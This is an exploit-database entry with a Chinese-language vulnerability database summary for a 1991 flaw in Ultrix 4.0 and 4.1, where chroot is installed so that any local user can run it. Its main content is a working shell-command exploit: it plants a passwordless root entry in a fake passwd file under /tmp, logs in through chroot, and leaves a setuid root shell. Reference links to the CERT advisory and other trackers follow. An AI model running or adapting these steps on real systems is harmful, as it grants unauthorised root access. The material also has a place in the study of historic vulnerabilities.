https://www.exploit-db.com/exploits/19041
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199105-001

DigitalUltrix4.1和4.0版本中的chroot被不安全安装，本地用户可以提升特权。

source: http://www.securityfocus.com/bid/17/info

By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges.

$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login

Then login as root with no password. chmod /tmp/bin/sh
to 4700, exit and run the suid /tmp/bin/sh.

来源:CERT/CCAdvisory:CA-1991-05
名称:CA-1991-05
链接:http://www.cert.org/advisories/CA-1991-05.html
来源:XF
名称:dec-chroot(577)
链接:http://xforce.iss.net/static/577.php
来源:BID
名称:17
链接:http://www.securityfocus.com/bid/17